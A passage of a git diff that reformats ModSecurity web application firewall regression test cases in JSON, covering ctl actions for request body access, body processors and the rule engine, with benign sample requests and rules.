"Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action" + "expected": { + "debug_log": "Request body processing is enabled, but disabled to this transaction due to ctl:requestBodyAccess action", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=Off\"", @@ -61,29 +63,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "493", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -101,20 +103,22 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim\"", @@ -122,29 +126,29 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRequestBodyAccess (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyAccess (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "493", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/test", - "method":"POST", - "body":[ + "uri": "/test", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -162,20 +166,22 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"--------------------------756b6d74fa1a8ee2" + "expected": { + "debug_log": "--------------------------756b6d74fa1a8ee2", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess Off", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RequestBodyAccess=On\"", diff --git a/test/test-cases/regression/action-ctl_request_body_processor.json b/test/test-cases/regression/action-ctl_request_body_processor.json index 52cfc2e651..e3b6554193 100644 --- a/test/test-cases/regression/action-ctl_request_body_processor.json +++ b/test/test-cases/regression/action-ctl_request_body_processor.json @@ -1,178 +1,202 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (1)", - "expected":{ - "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (1)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "732" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Registered XML namespace href \"http://schemas.xmlsoap.org/soap/envelope/\" prefix \"soap\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (2)", - "expected":{ - "debug_log": "Rule returned 0" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (2)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "732" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", "", "", - "Everyday Italian", - "Giada De Laurentiis", - "2005", - "30.00", + "Everyday Italian", + "Giada De Laurentiis", + "2005", + "30.00", "", - "", - "Harry Potter", - "J K. Rowling", - "2005", - "29.99", + "Harry Potter", + "J K. Rowling", + "2005", + "29.99", "", - "", - "XQuery Kick Start", - "James McGovern", - "Per Bothner", - "Kurt Cagle", - "James Linn", - "Vaidyanathan Nagarajan", - "2003", - "49.99", + "XQuery Kick Start", + "James McGovern", + "Per Bothner", + "Kurt Cagle", + "James Linn", + "Vaidyanathan Nagarajan", + "2003", + "49.99", "", - "", - "Learning XML", - "Erik T. Ray", - "2003", - "39.95", + "Learning XML", + "Erik T. Ray", + "2003", + "39.95", "", "" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "expected": { + "debug_log": "Rule returned 0", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] }, - { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing CtlRequestBodyProcessor=XML (3)", - "expected":{ - "debug_log": "XML: Failed to parse document." + { + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRequestBodyProcessor=XML (3)", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "9" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "not a xml" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "XML: Failed to parse document.", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book/price[text()] \"Fred\" \"phase:3,id:123,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json index 2ad6093e84..4b1c22732e 100644 --- a/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json +++ b/test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json @@ -1,97 +1,99 @@ [ { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "14", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"@contains lhebs\" \"phase:1,id:122,t:none,log,auditlog,pass,ctl:requestBodyProcessor=URLENCODED\"", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"ctl:requestBodyProcessor=URLENCODED", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "ctl:requestBodyProcessor=URLENCODED", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/x-www-form-urlencoded", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "14", + "Content-Type": "application/x-www-form-urlencoded", + "Expect": "100-continue" }, - "uri":"/a=urlencoded", - "method":"POST", - "body":[ - "param1=value1\r" + "uri": "/a=urlencoded", + "method": "POST", + "body": [ + "param1=value1\r" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Target value: \\\"value1", + "expected": { + "debug_log": "Target value: \\\"value1", "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule ARGS_POST \"@contains value1\" \"phase:2,id:123,t:none,deny,log,auditlog\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_engine.json b/test/test-cases/regression/action-ctl_rule_engine.json index 927b7077e8..db9885fa72 100644 --- a/test/test-cases/regression/action-ctl_rule_engine.json +++ b/test/test-cases/regression/action-ctl_rule_engine.json @@ -1,44 +1,47 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (1)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off\"", @@ -46,45 +49,48 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (2)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"POST", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "POST", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly\"", @@ -92,222 +98,237 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (3)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On\"", "SecRule ARGS \"@contains test\" \"id:2,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (4)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (4)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Enabled as requested by a ctl:ruleEngine action", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=On,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (5)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (5)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to Disabled as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=Off,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,ctl:RuleEngine=DetectionOnly,log,phase:3,block,deny,status:302\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleEngine (7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"12", - "Content-Type":"plain/text", - "Expect":"100-continue" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleEngine (7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Content-Type": "plain/text", + "Expect": "100-continue" }, - "uri":"/test?test=test", - "method":"GET", - "body":[ ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/test?test=test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", + "expected": { + "debug_log": "Setting SecRuleEngine to DetectionOnly as requested by a ctl:ruleEngine action", "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRule REQUEST_URI \"@contains test\" \"id:1,phase:1,pass,t:trim,log,phase:3,block,deny,status:302,ctl:RuleEngine=DetectionOnly\"" ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_by_id.json b/test/test-cases/regression/action-ctl_rule_remove_by_id.json index ba89561d57..afbd47cb98 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_by_id.json +++ b/test/test-cases/regression/action-ctl_rule_remove_by_id.json @@ -1,66 +1,90 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteById (1)", - "expected":{ - "debug_log": "Rule id: 1 was skipped due to a ruleRemoveById action..." + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteById (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "text/xml" + "Content-Type": "text/xml", + "Content-Length": "0" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + 